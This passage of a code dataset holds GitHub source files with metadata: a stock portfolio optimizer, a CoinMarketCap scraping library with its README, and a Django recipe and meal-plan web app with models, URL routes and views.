result\n![](https://github.com/tongplw/Backtesting-of-MVO-portfolio/blob/master/example.png)\n" }, { "alpha_fraction": 0.5987460613250732, "alphanum_fraction": 0.6175548434257507, "avg_line_length": 29.11320686340332, "blob_id": "be1303c5c4b388f14459a9d279d6246063da122b", "content_id": "8660d02a108903bdf35895f390a330c98e7b82f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1595, "license_type": "permissive", "max_line_length": 94, "num_lines": 53, "path": "/optimizer.py", "repo_name": "wayRaimy/Backtesting-of-MVO-portfolio", "src_encoding": "UTF-8", "text": "import datetime\nimport numpy as np\nimport pandas as pd\nimport pandas_datareader as pdr\nfrom scipy import optimize\n\n\ndef getStockDataFrame(stocks):\n \"\"\"Return data frame of daily stock's price\"\"\"\n stocks = [stock.strip()+'.BK' for stock in stocks]\n w = pd.DataFrame()\n t = []\n for s in stocks:\n data = pdr.get_data_yahoo(\n s, \n start=datetime.datetime(2009, 1, 1), \n end=datetime.datetime(2019, 1, 1),\n interval='d'\n )\n px = data[['Close']]\n t.append(px)\n w = pd.concat(t, axis=1, join='outer')\n w.columns = [name.split('.')[0] for name in stocks]\n return w\n\n\ndef allocate(stocks_dataframe):\n portfolio_size = len(stocks_dataframe.columns)\n returns = stocks_dataframe.pct_change()\n mean_return = np.array(returns.mean())\n annualized_return = np.round(mean_return * 252.0, 2)\n cov_matrix = np.multiply(returns.cov(), 252.0)\n\n def portfolio_return(x):\n return np.array(np.dot(x.T, annualized_return))\n\n def portfolio_var(x):\n return np.array((np.dot(np.dot(x.T, cov_matrix), x)))\n\n def target(x):\n return np.array(-1 * (0.1 * portfolio_return(x) - portfolio_var(x)))\n\n # Optimize\n initial_guess = np.random.random(portfolio_size)\n initial_guess = initial_guess / sum(initial_guess)\n out = optimize.minimize(target, initial_guess, bounds=tuple([(0.05, 1)] * portfolio_size))\n out.x = out.x / np.sum(np.abs(out.x))\n\n weights = {}\n for i in range(portfolio_size):\n weights[stocks_dataframe.columns[i]] = out.x[i]\n\n return weights" }, { "alpha_fraction": 0.6430678367614746, "alphanum_fraction": 0.6519173979759216, "avg_line_length": 21.66666603088379, "blob_id": "6015543d91b9bad3ef2430ed906c3fcdd27268f9", "content_id": "d23db3ad86e0657e87bcd9f6c4bd6dc99640877c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 339, "license_type": "permissive", "max_line_length": 63, "num_lines": 15, "path": "/test.py", "repo_name": "wayRaimy/Backtesting-of-MVO-portfolio", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\n\nplt_day = []\nplt_val = []\n\ndata = pd.read_csv(\"monthly.csv\", index_col=0)\nfor index, row in enumerate(data.iterrows()):\n plt_day += [datetime.strptime(row[0], '%Y-%m-%dT%H:%M:%S')]\n plt_val += [row[1]['Close']]\n\nplt.plot(plt_day, plt_val)\nplt.show()" } ]
4
moralfager/coinmarketpy
https://github.com/moralfager/coinmarketpy
b80a9039dda60a16d2b159b4c42ab6908b1d751e
60cce47e4165310f3c0a060bce4456fa5a50eec0
c2a49739414b55a3e2ed4c8018054c6d94b168b2
refs/heads/master
2023-08-16T02:27:45.341994
2021-10-11T02:41:45
2021-10-11T02:41:45
415,602,111
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.46023884415626526, "alphanum_fraction": 0.47606563568115234, "avg_line_length": 43.012821197509766, "blob_id": "1b3aa12551b3b12cb50782d01acc5402da95f5d8", "content_id": "4dd0440362102f9ec0c578e00265aafbede355c2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10299, "license_type": "permissive", "max_line_length": 115, "num_lines": 234, "path": "/src/coinmarket.py", "repo_name": "moralfager/coinmarketpy", "src_encoding": "UTF-8", "text": "import math\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport time\n\n\nclass CoinMarket:\n __DEFAULT_HEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0\",\n \"X-Requested-With\": \"XMLHttpRequest\"\n }\n\n def __init__(self, header=__DEFAULT_HEADERS):\n self.header = header\n\n def url_to_txt(self, txt, count_for_unique_urls=0):\n f = open(txt, 'w')\n urls = self.get_url()\n for url in range(len(urls)):\n unique_urls = f\"https://coinmarketcap.com{urls[url]}\\n\"\n f.write(unique_urls)\n count_for_unique_urls += 1\n print(f\"[INFO] => {count_for_unique_urls} elements entered into a {txt} file \")\n\n def get_url(self, count=0, quantity=-1):\n urls = []\n unique_url = []\n if quantity == -1:\n for i in range(1, self.count_of_page() + 1):\n url = f'https://coinmarketcap.com/?page={i}'\n bsoup = BeautifulSoup(requests.get(url, headers=self.header).content, 'lxml')\n tbody = bsoup.find(\"tbody\")\n all_tr = tbody.find_all(\"tr\")\n for item in all_tr:\n all_td = item.find_all(\"td\")\n for item1 in all_td:\n all_links = item1.find_all('a', class_=\"cmc-link\")\n for item2 in all_links:\n item_url = item2.get(\"href\").replace(\"markets/\", \"\").replace(\"?period=7d\", \"\")\n urls.append(item_url)\n count += 1\n print(f'{count} is done')\n urls = list(dict.fromkeys(urls))\n elif quantity >= 0:\n count_of_page = math.ceil(quantity / 100)\n print(count_of_page)\n for j in range(1, count_of_page + 1):\n url = f'https://coinmarketcap.com/?page={j}'\n bsoup = BeautifulSoup(requests.get(url, headers=self.header).content, 'lxml')\n tbody = bsoup.find(\"tbody\")\n all_tr = tbody.find_all(\"tr\")\n for item in all_tr:\n all_td = item.find_all(\"td\")\n for item1 in all_td:\n all_links = item1.find_all('a', class_=\"cmc-link\")\n for item2 in all_links:\n item_url = item2.get(\"href\").replace(\"markets/\", \"\").replace(\"?period=7d\", \"\")\n urls.append(item_url)\n count += 1\n print(f'{count} is done')\n urls = list(dict.fromkeys(urls))\n pop_count = 100 - (quantity % 100)\n print(pop_count)\n for i in range(pop_count):\n urls.pop()\n count_for_unique_urls = 0\n for url in range(len(urls)):\n temp = f\"https://coinmarketcap.com{urls[url]}\"\n unique_url.append(temp)\n count_for_unique_urls += 1\n print(f\"[INFO] => {count_for_unique_urls} elements\")\n return unique_url\n\n def count_of_page(self):\n page = self.find_count_of_crypto() / 100\n return math.ceil(page)\n\n def find_count_of_crypto(self):\n url = f'https://coinmarketcap.com/'\n soup = BeautifulSoup(requests.get(url, headers=self.header).content, 'lxml')\n div = soup.find('div', class_=\"sc-16r8icm-0 sc-4r7b5t-0 gJbsQH\")\n showing = div.find('p', class_=\"sc-1eb5slv-0 hykWbK\")\n return int(showing.text[-4:])\n\n def print_info(self, url, count, data, retry=10):\n currency = {'Cryptocurrencies': []}\n for i in range(1):\n try:\n response = requests.get(url=url, headers=self.header)\n result = response.content\n soup = BeautifulSoup(result, 'lxml')\n price_value = soup.find(class_=\"priceValue\")\n name = soup.find(\"span\", class_=\"sc-1eb5slv-0 sc-1308828-0 bwAAhr\")\n # name_symbol = soup.find(class_=\"nameSymbol\")\n stats = soup.find_all(class_=\"statsValue\")\n # usd_converter = soup.find_all(class_=\"sc-16r8icm-0 sc-1etv19d-4 iQGGZq\")\n\n # 0 - marcap 1 - full marcap 2 - volume24 3- volume/marcap 4 - circulating Supply\n currency['Cryptocurrencies'].append({\n 'ID': count,\n 'Name': name.text,\n 'Price': price_value.text,\n 'Market Capitalization': stats[0].text,\n 'Fully Diluted Market Cap': stats[1].text,\n 'Volume 24h': stats[2].text,\n 'Volume/Marcap': stats[3].text,\n 'Circulating Supply': stats[4].text\n })\n data.append(currency)\n print(currency)\n print(f'{count} {name.text} is [DONE]')\n except Exception as ex:\n time.sleep(15)\n if retry:\n print(f\"[INFO] retry = {retry} =>{url}\")\n return self.print_info(url, count, retry=(retry - 1), data=data)\n else:\n currency['Cryptocurrencies'].append({\n 'ID': count,\n 'Name': None,\n 'Price': None,\n 'Market Capitalization': None,\n 'Fully Diluted Market Cap': None,\n 'Volume 24h': None,\n 'Volume/Marcap': None,\n 'Circulating Supply': None\n })\n data.append(currency)\n print(currency)\n continue\n else:\n return response\n return data\n\n def info_to_json(self, url, count, retry=15):\n currency = {'Cryptocurrencies': []}\n for i in range(1):\n try:\n response = requests.get(url=url, headers=self.header)\n result = response.content\n soup = BeautifulSoup(result, 'lxml')\n price_value = soup.find(class_=\"priceValue\")\n name = soup.find(\"span\", class_=\"sc-1eb5slv-0 sc-1308828-0 bwAAhr\")\n # name_symbol = soup.find(class_=\"nameSymbol\")\n stats = soup.find_all(class_=\"statsValue\")\n # usd_converter = soup.find_all(class_=\"sc-16r8icm-0 sc-1etv19d-4 iQGGZq\")\n\n # 0 - marcap 1 - full marcap 2 - volume24 3- volume/marcap 4 - circulating Supply\n currency['Cryptocurrencies'].append({\n 'ID': count,\n 'Name': name.text,\n 'Price': price_value.text,\n 'Market Capitalization': stats[0].text,\n 'Fully Diluted Market Cap': stats[1].text,\n 'Volume 24h': stats[2].text,\n 'Volume/Marcap': stats[3].text,\n 'Circulating Supply': stats[4].text\n })\n print(f'{count} {name.text} is [DONE]')\n with open('CoinMarket.json', 'w') as file:\n json.dump(currency, file, indent=4, ensure_ascii=False)\n except Exception as ex:\n time.sleep(15)\n if retry:\n print(f\"[INFO] retry = {retry} =>{url}\")\n return self.info_to_json(url, count, retry=(retry - 1))\n else:\n currency['Cryptocurrencies'].append({\n 'ID': count,\n 'Name': None,\n 'Price': None,\n 'Market Capitalization': None,\n 'Fully Diluted Market Cap': None,\n 'Volume 24h': None,\n 'Volume/Marcap': None,\n 'Circulating Supply': None\n\n })\n with open('CoinMarket.json', 'w') as file:\n json.dump(currency, file, indent=4, ensure_ascii=False)\n f = open('ex_log.txt', 'w')\n f.write(f\"{count} {url}\\n\")\n continue\n else:\n return response\n\n def get_top(self, quantity):\n data = []\n all_information = self.get_url(quantity=quantity)\n count = 1\n for all_info in all_information:\n self.print_info(url=all_info, count=count, data=data)\n count += 1\n\n def get_all_info(self):\n data = []\n all_information = self.get_url()\n count = 1\n for all_info in all_information:\n self.print_info(url=all_info, count=count, data=data)\n count += 1\n print(data)\n\n def get_news(self, coin_name):\n result_list = []\n while True:\n total_count = self.find_count_of_crypto()\n responce = requests.get(url=f'https://api.coinmarketcap.com/data-api/v3/cryptocurrency/listing?start=1'\n f'&limit={total_count}&sortBy=market_cap&'\n f'sortType=desc&convert=USD&cryptoType=all&tagType=all&audited=false')\n data = responce.json()\n for i in range(0, total_count):\n result_list.append({\n 'id': data['data']['cryptoCurrencyList'][i]['id'],\n 'name': data['data']['cryptoCurrencyList'][i]['name']\n })\n print(result_list)\n for i in range(0, total_count):\n if 'name' == 'Bitcoin' in result_list:\n print(result_list.get('id'))\n for i in range(len(result_list)):\n if result_list[i]['name'] == coin_name.lower().title():\n coin_id = result_list[i]['id']\n urls = f'https://api.coinmarketcap.com/content/v3/news?coins={coin_id}'\n res = requests.get(url=urls)\n data_news = res.json()\n data_news_json = []\n for i in range(0, len(data_news['data'])):\n data_news_json.append({\n 'News title': data_news['data'][i]['meta']['title'],\n 'Text': data_news['data'][i]['meta']['subtitle']\n })\n return data_news_json\n" }, { "alpha_fraction": 0.6646115779876709, "alphanum_fraction": 0.7139334082603455, "avg_line_length": 40.589744567871094, "blob_id": "cf42aea372c7252a83641b15756224ecb4e28fc0", "content_id": "9c304fc14cd9b7233c9dc3c0a61df2cf8778e9cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1624, "license_type": "permissive", "max_line_length": 619, "num_lines": 39, "path": "/README.md", "repo_name": "moralfager/coinmarketpy", "src_encoding": "UTF-8", "text": "# CoinMarket scrapper\n\n\n\n### Installation\n```bash\ngit clone https://github.com/moralfager/coinmarketpy.git\n```\n\n### Usage\n\n```python\nfrom coinmarketpy.src.coinmarket import CoinMarket\ncm = CoinMarket()\n```\n\n### Examples\nUsage examples:\n```python\n# getting all url, if quantity not provided\n>>> cm.get_url(quantity=1)\n['https://coinmarketcap.com/currencies/bitcoin/']\n>>> cg.get_price(ids='bitcoin,litecoin,ethereum', vs_currencies='usd')\n# News about crypto\n>>> cm.get_news('Bitcoin')\n[{'News title': 'US Senator Reveals That She Had Stacked Up $100K Worth Of BTC In August', 'Text': 'Senator Cynthia Lummis revealed through a filing that she had purchased bitcoin in August. The value of her BTC purchase is worth between $50K to $100K. Senator Lummis is one of the pro-crypto members of the senate, notably saying that she would like bitcoin to form “part of a di...'}, {'News title': 'Voting period for Mt. Gox civil rehabilitation plan finally ends', 'Text': 'Tokyo-based crypto exchange Mt. Gox shut down in 2014 after it lost Bitcoin (BTC) worth $450 million at the time... Continue reading \\n'}]\n# Printing all information about currencies\n>>> cm.get_all_info()\n# List of top by market cap\n>>> cm.get_top(quantity=1)\n{'Cryptocurrencies': [{'ID': 1, 'Name': 'Bitcoin', 'Price': '$55,366.58', 'Market Capitalization': '$1,043,102,852,155', 'Fully Diluted Market Cap': '$1,162,698,149,960', 'Volume 24h': '$35,633,816,402', 'Volume/Marcap': '0.03416', 'Circulating Supply': '18,839,937.00 BTC'}]}\n\n```\n\n### API documentation\nhttps://coinmarketcap.com/api/\n\n## License\n[MIT](https://choosealicense.com/licenses/mit/)\n" } ]
2
Tomaszdud/ZaplanujWorkout
https://github.com/Tomaszdud/ZaplanujWorkout
72706e096e8df8587c3410c883756b411117a9c3
293a7afebe2c3faa4eab899b45b6e333bd7c7a92
08ee75ed716f4b0da73bc3ccbd9a700c99a73256
refs/heads/master
2020-06-04T08:42:01.341711
2019-06-18T14:06:45
2019-06-18T14:06:45
191,949,554
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5392540097236633, "alphanum_fraction": 0.550266444683075, "avg_line_length": 41.65151596069336, "blob_id": "b9fcc6de6e2bb0418cddbed5804cc0e64e81e67c", "content_id": "e0e2b755da8d15d3f06f5d6f338f8e76a96f264c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2815, "license_type": "no_license", "max_line_length": 142, "num_lines": 66, "path": "/jedzonko/migrations/0001_initial.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0 on 2019-05-07 20:42\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='DayName',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=16, unique=True)),\n ('order', models.SmallIntegerField(unique=True)),\n ],\n ),\n migrations.CreateModel(\n name='Page',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=255)),\n ('description', models.TextField()),\n ('slug', models.CharField(max_length=255)),\n ],\n ),\n migrations.CreateModel(\n name='Plan',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField()),\n ('created', models.DateField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Recipe',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=255)),\n ('ingredients', models.TextField()),\n ('description', models.TextField()),\n ('created', models.DateField(auto_now_add=True)),\n ('updated', models.DateField(auto_now=True)),\n ('preparation_time', models.IntegerField()),\n\t\t('preparation',models.TextField()),\n ('votes', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='RecipePlan',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('meal_name', models.CharField(max_length=255)),\n ('order', models.SmallIntegerField()),\n ('day_name', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='jedzonko.DayName')),\n ('plan', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='jedzonko.Plan')),\n ('recipe', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='jedzonko.Recipe')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.7015075087547302, "alphanum_fraction": 0.7128978371620178, "avg_line_length": 39.876712799072266, "blob_id": "f7573b746dd2ef17ef2db1196ce4c030d8d730af", "content_id": "782f2dd6a57b131b3361dc8c76887450170c9556", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3043, "license_type": "no_license", "max_line_length": 141, "num_lines": 73, "path": "/jedzonko/models.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\n# Create your models here.\n\n# - **recipe**: Tabela zawierająca przepisy.\n# - id: klucz główny tabeli,\n# - name: nazwa przepisu, varchar(255)\n# - ingredients: składniki przepisu, text\n# - description: treść przepisu, text\n# - created: data dodania przepisu (powinna być wypełniana automatycznie), timestamp with timezone\n# - updated: data aktualizacji przepisu (powinna być wypełniana automatycznie), timestamp with timezone\n# - preparation_time: czas przygotowania (w minutach), integer\n# - preparation: sposób przygotowania\n# - votes: liczba głosów na przepis, integer\n\nclass Recipe(models.Model):\n name = models.CharField(max_length=255)\n ingredients = models.TextField()\n description = models.TextField()\n created = models.DateField(auto_now_add = True)\n updated = models.DateField(auto_now = True)\n preparation_time = models.IntegerField()\n preparation = models.TextField()\n votes = models.IntegerField()\n\n# - **plan**: Tabela zawierająca informacje na temat planów.\n# - id: klucz główny tabeli,\n# - name: nazwa planu, varchar(255)\n# - description: opis planu, text\n# - created: data utworzenia. timestamp with timezone\n\nclass Plan(models.Model):\n name = models.CharField(max_length=255)\n description = models.TextField()\n created = models.DateField(auto_now_add = True)\n\n#\n# - **dayname**: Tabela zawierająca nazwy dni (podejmijcie decyzję projektową: zastanówcie się, czy nie lepiej zamienić to na enuma w Django)\n# - id: klucz główny tabeli,\n# - name: nazwa dnia, varchar(16)\n# - order: kolejność dnia, integer\n\nclass DayName(models.Model):\n name = models.CharField(max_length=16, unique=True)\n order = models.SmallIntegerField(unique=True)\n\n# - **page**: Tabela zawierająca dane strony.\n# - id: klucz główny tabeli,\n# - title: tytuł strony, varchar(255)\n# - descritption: treść strony, text\n# - slug: unikalny identyfikator tworzony na podstawie tytułu, varchar(255)\n\nclass Page(models.Model):\n title = models.CharField(max_length=255)\n description = models.TextField()\n slug = models.CharField(max_length=255)\n\n#\n# - **recipeplan**: Tabela zawierająca informacje o połączeniu przepisu oraz planu.\n# - id: klucz główny tabeli,\n# - meal_name: nazwa posiłku, varchar(255)\n# - recipe_id: klucz obcy do tabeli przepisów (w modelu nazwij to „recipe”),\n# - plan_id: klucz obcy do tabeli planów (w modelu nazwij to „plan”),\n# - order: kolejność posiłków w planie, integer\n# - day_name_id: klucz obcy z do tabeli day_name (w modelu nazwij to „day_name”)\n\nclass RecipePlan(models.Model):\n meal_name = models.CharField(max_length=255)\n order = models.SmallIntegerField()\n recipe = models.ForeignKey('Recipe', on_delete=models.DO_NOTHING, blank=True, null=True)\n plan = models.ForeignKey('Plan', on_delete=models.DO_NOTHING, blank=True, null=True)\n day_name = models.ForeignKey('DayName', on_delete=models.DO_NOTHING, blank=True, null=True)\n\n" }, { "alpha_fraction": 0.661963164806366, "alphanum_fraction": 0.666871190071106, "avg_line_length": 38.75609588623047, "blob_id": "c775df7446aeda6b79d4c51507b05df2fe779297", "content_id": "7ba0261529a45e8baa65ce910957bc58cf1860ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1630, "license_type": "no_license", "max_line_length": 89, "num_lines": 41, "path": "/scrumlab/urls.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "\"\"\"scrumlab URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom jedzonko.views import IndexView, About, Contact, RecipesList,PlanList,\\\n LandingPage, MainPage, AddRecipe,AddPlan, RecipeDetails, AddPlanDetails,PlanId,Main,\\\n ModifyRecipe, Login\n\n\nurlpatterns = [\n path('index/', IndexView.as_view()),\n path('about/', About.as_view()), \n path('contact/', Contact.as_view()), \n path('main/', IndexView.as_view()),\n path('recipe/list/', RecipesList.as_view()),\n path('', LandingPage.as_view()),\n path('main/', MainPage.as_view()),\n path('recipe/<int:id>/', RecipeDetails.as_view()),\n path('recipe/add/', AddRecipe.as_view()),\n path('recipe/modify/<id>/',ModifyRecipe.as_view()),\n path('plan/list/',PlanList.as_view()),\n path('plan/<int:id>/',PlanId.as_view()),\n path('plan/add/', AddPlan.as_view()),\n path('plan/add/details/', AddPlanDetails.as_view()),\n path('about/', About),\n path('contact/', Contact),\n path('login/', Login.as_view()),\n]\n" }, { "alpha_fraction": 0.6065940856933594, "alphanum_fraction": 0.6092398762702942, "avg_line_length": 32.886207580566406, "blob_id": "6e1c65039769674ee853f4e8b091eb20c92ffc5a", "content_id": "3404637c95024931f62a10b1909a91ac965ac849", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9832, "license_type": "no_license", "max_line_length": 149, "num_lines": 290, "path": "/jedzonko/views.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom django.shortcuts import render\nfrom django.views import View \nfrom django.core.paginator import Paginator\nfrom django.shortcuts import render, render_to_response,redirect,get_object_or_404\nfrom random import randint, shuffle\nfrom django.http import HttpResponse, HttpResponseForbidden\nfrom django.views import View\nfrom jedzonko.models import Recipe, Plan, DayName, RecipePlan\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\n\nclass IndexView(View):\n def get(self, request):\n ctx = {\"actual_date\": datetime.now()}\n return render(request, \"test.html\", ctx)\n\nclass About(View):\n\n def get(self, request): \n return render(request,\"about.html\")\n\nclass Contact(View): \n\n def get(self, request):\n return render(request,\"contact.html\")\n\nclass Main(View): \n\n def get(self, request):\n return render(request,\"index.html\")\n\nclass LandingPage(View):\n def get(self, request):\n recipes_number = Recipe.objects.all().count()\n numbers = list(range(1, int(recipes_number)))\n shuffle(numbers)\n random1 = numbers.pop()\n random2 = numbers.pop()\n random3 = numbers.pop()\n\n recipes = Recipe.objects.filter(pk=random1) | Recipe.objects.filter(pk=random2) | Recipe.objects.filter(pk=random3)\n\n ctx = {\"recipes\": recipes}\n return render(request, \"index.html\", ctx)\n\n\nclass RecipesList(View):\n\n def get(self,request):\n\n recipes = Recipe.objects.order_by(\"-votes\", \"-created\")\n paginator = Paginator(recipes,3)\n\n page = request.GET.get('page')\n sorted = paginator.get_page(page)\n\n ctx = {\"recipes\": sorted}\n return render(request, 'recipes.html', ctx)\n\n\nclass MainPage(View):\n def get(self,request):\n plans_number = Plan.objects.all().count()\n recipes_number = Recipe.objects.all().count()\n\n get_plans = Plan.objects.order_by(\"created\")\n get_first_plan=get_plans[0]\n day_name= DayName.objects.all().order_by(\"order\")\n plan_recipe= RecipePlan.objects.filter(plan=get_first_plan.id).order_by(\"order\")\n\n Weekly_Plan = []\n for day in day_name:\n Daily_recipes = []\n Single_day = {}\n for item in plan_recipe:\n if item.day_name.name == day.name:\n Daily_recipes.append(item)\n\n Single_day[day.name] = Daily_recipes\n Weekly_Plan.append(Single_day)\n\n\n\n ctx = {\"plans_number\": plans_number, \"recipes_number\": recipes_number,\n \"plan_name\": get_first_plan, \"Weekly_Plan\": Weekly_Plan}\n\n return render(request,'dashboard.html', ctx)\n\n\nclass PlanList(View):\n\n def get(self,request):\n sorted_plans=Plan.objects.order_by(\"name\")\n paginator = Paginator(sorted_plans, 3)\n\n page = request.GET.get('page')\n sorted = paginator.get_page(page)\n\n ctx = {\"plans\": sorted}\n return render(request, 'plans.html',ctx)\n\n\nclass AddRecipe(View):\n\n def get(self,request):\n\n if \"field_bad\" in request.session:\n\n null_fields=\"wypełnij poprawnie wszystkie pola\"\n\n ctx={\"null_field\":null_fields}\n\n del request.session[\"field_bad\"]\n\n return render(request,'app-add-recipe.html',ctx)\n\n return render(request,'app-add-recipe.html')\n\n\n def post(self,request):\n recipe_name=request.POST.get(\"recipe_name\")\n recipe_description = request.POST.get(\"recipe_description\")\n preparation_time = request.POST.get(\"preparation_time\")\n recipe_preparation = request.POST.get(\"recipe_preparation\")\n recipe_ingredients = request.POST.get(\"recipe_ingredients\")\n\n if (recipe_name and recipe_description and preparation_time and\n recipe_preparation and recipe_ingredients) is not \"\":\n\n new_recipe=Recipe.objects.create(name=recipe_name,description=recipe_description,\n preparation_time=preparation_time,preparation=recipe_preparation,ingredients=recipe_ingredients,votes=0)\n\n return redirect(\"/recipe/list\")\n\n request.session[\"field_bad\"]=True\n return redirect(\"/recipe/add\")\n\nclass PlanId(View):\n\n def get(self,request,id):\n plan_details = Plan.objects.get(pk=id)\n plan_recipe = RecipePlan.objects.filter(plan=id).order_by(\"order\")\n days = DayName.objects.all().order_by(\"order\")\n\n Weekly_Plan = []\n\n for day in days:\n\n Daily_recipes = []\n Single_day = {}\n\n for item in plan_recipe:\n\n if item.day_name.name == day.name:\n Daily_recipes.append(item)\n\n Single_day[day.name] = Daily_recipes\n Weekly_Plan.append(Single_day)\n\n ctx = {\"plan_name\": plan_details, \"Weekly_Plan\": Weekly_Plan,\"plan_recipe\":plan_recipe}\n\n\n return render(request,\"app-details-schedules.html\",ctx)\n\nclass AddPlan(View):\n\n def get(self,request):\n\n if \"field_bad\" in request.session:\n null_fields=\"wypełnij poprawnie wszystkie pola\"\n ctx={\"null_field\":null_fields}\n del request.session[\"field_bad\"]\n return render(request,'app-add-schedules.html',ctx)\n return render(request,'app-add-schedules.html')\n\n\n def post(self,request):\n plan_name=request.POST.get(\"planName\")\n plan_description = request.POST.get(\"planDescription\")\n if (plan_name and plan_description) is not \"\":\n new_plan=Plan.objects.create(name=plan_name,description=plan_description)\n request.session[\"plan_id\"]=new_plan.pk\n return redirect(\"/plan/add/details\")\n\n request.session[\"field_bad\"]=True\n return redirect(\"/plan/add\")\n\n\nclass RecipeDetails(View):\n def get(self,request, id):\n\n recipeID_valid = False\n\n try:\n recipe = Recipe.objects.get(pk=id)\n recipeID_valid = True\n ingredients_arr = []\n recipe_ingr = recipe.ingredients.split(\", \")\n for ingr in recipe_ingr:\n ingredients_arr.append(ingr)\n\n ctx = {\"recipe\": recipe, \"ingredients_arr\": ingredients_arr, \"recipeIsValid\": recipeID_valid}\n\n except ObjectDoesNotExist as e:\n recipeID_valid = False\n error = \"Brak przepisu dla ID: {}\".format(id)\n ctx = { \"recipeIsValid\": recipeID_valid, \"error\" : error }\n\n return render(request, 'app-recipe-details.html', ctx)\n\n def post(self, request, id):\n\n try:\n recipe = Recipe.objects.get(pk=id)\n like=request.POST.get(\"like\")\n dislike=request.POST.get(\"dislike\")\n if like is not None:\n recipe.votes += 1\n elif dislike is not None:\n recipe.votes -= 1\n recipe.save()\n return redirect(\"/recipe/{}\".format(id))\n except Exception as e:\n recipeID_valid = False\n error = \"Błąd!!! {}\".format(id)\n ctx = { \"recipeIsValid\": recipeID_valid, \"error\" : error }\n return render(request,'app-recipe-details.html',ctx)\n\nclass AddPlanDetails(View):\n\n def get(self,request):\n if \"plan_id\" in request.session:\n plan_id= request.session['plan_id']\n plan_name=Plan.objects.all()\n recipe_name = Recipe.objects.all()\n day_name=DayName.objects.all()\n\n ctx= {\"plan_id\": plan_id,\"plan_name\" : plan_name, \"recipe_name\" : recipe_name, \"day_name\" : day_name}\n return render(request, \"app-schedules-meal-recipe.html\",ctx)\n\n return HttpResponseForbidden(\"Error403-Access to this resource on the derver is denied!\")\n\n def post(self,request):\n if \"plan_id\" in request.session:\n plan_id= request.session['plan_id']\n plan_name=Plan.objects.all()\n recipe_name = Recipe.objects.all()\n day_name=DayName.objects.all()\n\n ctx= {\"plan_id\": plan_id,\"plan_name\" : plan_name, \"recipe_name\" : recipe_name, \"day_name\" : day_name}\n return render(request, \"app-schedules-meal-recipe.html\",ctx)\n return HttpResponseForbidden(\"Error403-Access to this resource on the server is denied!\")\n \nclass ModifyRecipe(View):\n def get(self, request,id):\n recipe=get_object_or_404(Recipe,id=id)\n ctx={\"recipe\" : recipe}\n if \"field_bad\" in request.session:\n null_fields = \"Wypełnij poprawnie wszystkie pola\"\n ctx = {\"null_field\": null_fields}\n del request.session[\"field_bad\"]\n return render(request, 'app-edit-recipe.html', ctx)\n return render(request, 'app-edit-recipe.html',ctx)\n\n def post(self, request,id):\n recipe_name = request.POST.get(\"recipe_name\")\n recipe_ingredients = request.POST.get(\"recipe_ingredients\")\n recipe_description = request.POST.get(\"recipe_description\")\n preparation_time = request.POST.get(\"preparation_time\")\n recipe_preparation = request.POST.get(\"recipe_preparation\")\n\n if (recipe_name and recipe_ingredients and recipe_description and preparation_time and\n recipe_preparation) is not \"\":\n modify_recipe = Recipe.objects.create(name=recipe_name, ingredients=recipe_ingredients,\n description=recipe_description,\n preparation_time=preparation_time, preparation=recipe_preparation,\n votes=0)\n return redirect(\"/recipe/list\")\n\n request.session[\"field_bad\"] = True\n return redirect(\"/recipe/modify/{}\".format(id))\n\n\nclass Login(View):\n def get(self,request):\n return render(request,\"login.html\")\n\n # def 